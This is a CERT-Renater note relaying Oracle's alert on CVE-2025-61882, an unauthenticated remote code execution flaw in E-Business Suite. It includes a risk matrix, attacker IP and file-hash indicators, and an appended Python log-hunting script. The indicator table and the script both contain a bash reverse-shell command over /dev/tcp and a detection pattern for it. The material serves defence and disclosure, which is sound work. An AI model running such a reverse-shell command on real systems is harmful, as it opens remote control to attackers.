=====================================================================

                            CERT-Renater

                Information Note No. 2025/VULN691
_____________________________________________________________________

DATE                : 13/10/2025

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running Oracle E-Business Suite versions
                          12.2.3 up to and including 12.2.14.

=====================================================================
https://www.oracle.com/security-alerts/alert-cve-2025-61882.html
_____________________________________________________________________

Oracle Security Alert Advisory - CVE-2025-61882

Description

This Security Alert addresses vulnerability CVE-2025-61882 in Oracle
E-Business Suite. This vulnerability is remotely exploitable without
authentication, i.e., it may be exploited over a network without the
need for a username and password. If successfully exploited, this
vulnerability may result in remote code execution.

Oracle strongly recommends that customers apply the updates provided
by this Security Alert as soon as possible. Oracle always recommends
that customers remain on actively-supported versions and apply all
Security Alerts and Critical Patch Update security patches without
delay. Note that the October 2023 Critical Patch Update is a
prerequisite for application of the updates in this Security Alert.

Indicators of compromise (IP addresses, observed commands, and files)
to support immediate detection, hunting, and containment are
detailed below the risk matrix.


Affected Products and Patch Information

Security vulnerabilities addressed by this Security Alert affect the
products listed below.

Please click on the links in the Patch Availability Document column
below to access the documentation for patch availability information
and installation instructions.


Affected Products and Versions           Patch Availability Document
Oracle E-Business Suite,                 Oracle E-Business Suite
versions 12.2.3-12.2.14


Security Alert Supported Products and Versions

Patches released through the Security Alert program are provided
only for product versions that are covered under the Premier Support
or Extended Support phases of the Lifetime Support Policy. Oracle
recommends that customers plan product upgrades to ensure that
patches released through the Security Alert program are available
for the versions they are currently running.

Product releases that are not under Premier Support or Extended
Support are not tested for the presence of vulnerabilities addressed
by this Security Alert. However, it is likely that earlier versions
of affected releases are also affected by these vulnerabilities.
As a result, Oracle recommends that customers upgrade to
supported versions.


References

    Oracle Critical Patch Updates, Security Alerts and Bulletins
    Oracle Critical Patch Updates and Security Alerts - Frequently
      Asked Questions
    Risk Matrix Definitions
    Use of Common Vulnerability Scoring System (CVSS) by Oracle
    English text version of the risk matrices
    CSAF JSON version of the risk matrices
    Map of CVE to Advisory/Alert
    Oracle Lifetime support Policy
    JEP 290 Reference Blocklist Filter


Risk Matrix Content

Risk matrices list only security vulnerabilities that are newly
addressed by the patches associated with this advisory. Risk
matrices for previous security patches can be found in previous
Critical Patch Update advisories and Alerts. An English text
version of the risk matrices provided in this document is here.

Security vulnerabilities are scored using CVSS version 3.1
(see Oracle CVSS Scoring for an explanation of how Oracle
applies CVSS version 3.1).

Oracle conducts an analysis of each security vulnerability
addressed by a Security Alert. Oracle does not disclose
detailed information about this security analysis to
customers, but the resulting Risk Matrix and associated
documentation provide information about conditions required
to exploit the vulnerability and the potential impact of a
successful exploit. Oracle provides this information so that
customers may conduct their own risk analysis based on the
particulars of their product usage. For more information, see
Oracle vulnerability disclosure policies.

The protocol in the risk matrix implies that all of its secure
variants are affected as well. For example, if HTTP is listed
as an affected protocol, it implies that HTTPS is also affected.
The secure variant of a protocol is listed in the risk matrix
only if it is the only variant affected.


Credit Statement

The following people or organizations reported security
vulnerabilities addressed by this Security Alert to Oracle:
None credited in this Security Alert.


Modification History

Date                    Note
2025-October-06         Rev 2. Clarified IOCs table.
2025-October-04         Rev 1. Initial Release.

 
 
Oracle E-Business Suite Risk Matrix

This Security Alert contains 1 new security patch for Oracle
E-Business Suite.  This vulnerability is remotely exploitable
without authentication, i.e., may be exploited over a network
without requiring user credentials.  The English text form of
this Risk Matrix can be found here.


CVE ID                        : CVE-2025-61882
Product                       : Oracle Concurrent Processing
Component                     : BI Publisher Integration
Protocol                      : HTTP
Remote Exploit without Auth.? : Yes

CVSS VERSION 3.1 RISK (see Risk Matrix Definitions)
Base Score                    : 9.8
Attack Vector                 : Network
Attack Complex                : Low
Privs Req'd                   : None
User Interact                 : None
Scope                         : Unchanged
Confidentiality               : High
Integrity                     : High
Availability                  : High

Supported Versions Affected   : 12.2.3-12.2.14
Notes                         :


Indicators of Compromise (IOCs)

The following indicators of compromise represent observed
activity (not limited to CVE-2025-61882) and are provided
to accelerate detection, threat hunting, and containment.
 
Indicator      Type     Description
200[.]107[.]207[.]26 	IP 	Potential GET and POST activity

185[.]181[.]60[.]11 	IP 	Potential GET and POST activity

sh -c /bin/bash -i >& /dev/tcp// 0>&1 	Command 	Establish an outbound TCP connection over a specific port

76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d 	SHA 256 	oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip

aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 	SHA 256 	oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py

6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b 	SHA 256 	oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py
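
Added example, not part of the Oracle or CERT-Renater advisory: one way to hunt for the IP and command indicators listed above. It assumes combined-format web server access logs and one process record per line; the function names, sample log lines, paths and 198.51.100.x address are constructed for illustration.

```python
import re

# IOC IPs from the table above, refanged for matching.
IOC_IPS = {s.replace("[.]", ".")
           for s in ("200[.]107[.]207[.]26", "185[.]181[.]60[.]11")}

# Combined log format prefix: client IP, ident, user, [time], "METHOD path
ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)')

# Shape of the command IOC. Host and port are elided on the page,
# so any (or no) value after /dev/tcp/ is accepted.
REVSHELL_RE = re.compile(r"bash\s+-i\s*>&\s*/dev/tcp/\S*\s+0>&1")


def hunt_access_log(lines):
    """Return (line_no, ip, method, path) for every request from an IOC IP."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = ACCESS_RE.match(line)
        if m and m.group(1) in IOC_IPS:
            hits.append((n, m.group(1), m.group(2), m.group(3)))
    return hits


def hunt_commands(lines):
    """Return line numbers of process/audit records matching the command IOC."""
    return [n for n, line in enumerate(lines, 1) if REVSHELL_RE.search(line)]


# Constructed sample data (not real logs).
SAMPLE_ACCESS = [
    '198.51.100.7 - - [04/Oct/2025:10:01:02 +0000] "GET /example/login HTTP/1.1" 200 512',
    '200.107.207.26 - - [04/Oct/2025:10:02:11 +0000] "GET /example/path-a HTTP/1.1" 200 1024',
    '185.181.60.11 - - [04/Oct/2025:10:02:15 +0000] "POST /example/path-b HTTP/1.1" 200 87',
    '185.181.60.11 - - [04/Oct/2025:10:02:16 +0000] "HEAD /example/path-b HTTP/1.1" 200 0',
]
SAMPLE_PROC = [
    "pid=4120 user=appuser cmd=java -server oracle.example.Main",
    "pid=4188 user=appuser cmd=sh -c /bin/bash -i >& /dev/tcp/<host>/<port> 0>&1",
]

if __name__ == "__main__":
    for hit in hunt_access_log(SAMPLE_ACCESS):
        print("access-log hit:", hit)
    print("command hits at lines:", hunt_commands(SAMPLE_PROC))
```

Every request from a listed IP is reported, not only GET and POST, so the method can be reviewed per hit. If the application tier sits behind a load balancer or reverse proxy, the first log field may be the proxy address, and the forwarded client address has to be matched instead.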


=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================




